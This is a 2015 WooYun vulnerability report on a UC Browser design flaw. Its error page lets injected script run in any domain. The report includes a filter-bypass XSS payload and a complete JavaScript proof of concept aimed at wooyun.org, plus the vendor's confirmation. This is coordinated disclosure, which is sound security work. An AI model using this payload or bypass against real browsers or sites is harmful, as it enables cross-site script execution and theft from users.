当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093214

漏洞标题:UC浏览器某处设计缺陷导致跨域脚本漏洞可跨任何域

相关厂商:UC Mobile

漏洞作者: Lyleaks

提交时间:2015-01-21 18:08

修复时间:2015-04-21 18:10

公开时间:2015-04-21 18:10

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-21: 细节已通知厂商并且等待厂商处理中
2015-01-22: 厂商已经确认,细节仅向厂商公开
2015-01-25: 细节向第三方安全合作伙伴开放
2015-03-18: 细节向核心白帽子及相关领域专家公开
2015-03-28: 细节向普通白帽子公开
2015-04-07: 细节向实习白帽子公开
2015-04-21: 细节向公众公开

简要描述:

UC浏览器设计上存在一个安全缺陷,导致可以突破浏览器同源策略,跨域执行任意脚本。

详细说明:

UC浏览器出错页面对失败网址没有过滤,导致XSS。
测试的时候发现,UC浏览器会把javascript:xss_code替换成javascript:void(0),把<script>之间的
代码和onerror等事件的代码替换为空,不能调用外部的js等。最后发现可以用下面代码绕过。

<iframe srcdoc="&lt;img src&equals;x:x onerror&equals;alert&lpar;document.domain&rpar;&gt;" />


而要访问浏览器的出错页面,可以让浏览器跳转到

ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1; ;FailReason=1;ErrorCode=1;


所以只要访问带有xss代码的url,再让浏览器跳转到出错页面,就能在任意域执行xss代码。
以乌云官网为例,构造如下poc。

<a href=javascript:foo()>Test it!</a>
<script>
var w;
var t;
function foo(){
w = window.open("http://www.wooyun.org/#\u0022\u003e\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u0064\u006f\u0063\u003d\u0022\u0026\u006c\u0074\u003b\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u0026\u0065\u0071\u0075\u0061\u006c\u0073\u003b\u0078\u003a\u0078\u0020\u006f\u006e\u0065\u0072\u0072\u006f\u0072\u0026\u0065\u0071\u0075\u0061\u006c\u0073\u003b\u0061\u006c\u0065\u0072\u0074\u0026\u006c\u0070\u0061\u0072\u003b\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u002e\u0064\u006f\u006d\u0061\u0069\u006e\u0026\u0072\u0070\u0061\u0072\u003b\u0026\u0067\u0074\u003b\u0022\u0020\u002f\u003e");
t = setInterval('bar()',100);
}
function bar(){
if (w.location.href !== 'about:blank') {
w.location='ext:lp:lp_netErrorInfo:#_NETWORK_FAIL_INFO_#;Url=http://www.example.com/;IP=1;IPNum=1; ;FailReason=1;ErrorCode=1;';
clearInterval(t);
}
}
</script>


点击Test it!

1.png


在www.wooyun.org执行xss代码

2.png


3.png


测试版本

4.png

漏洞证明:

访问
http://utf7.ml/t/uc1.html
点击Test it!

修复方案:

修复XSS

版权声明:转载请注明来源 Lyleaks@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-01-22 14:38

厂商回复:

漏洞存在,已转给相关同学处理,非常感谢!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-21 18:39 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明,什么也没有留下)

    赚点云币买树莓派 XD

  2. 2015-01-21 18:52 | 瘦蛟舞 认证白帽子 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

    http://utf7.ml/welcome.html

  3. 2015-01-21 18:54 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    PL

  4. 2015-01-21 22:21 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

    .......

  5. 2015-01-30 18:42 | Lyleaks ( 普通白帽子 | Rank:137 漏洞数:9 | 这个人很聪明,什么也没有留下)

    @UC Mobile 礼物已收到,Thx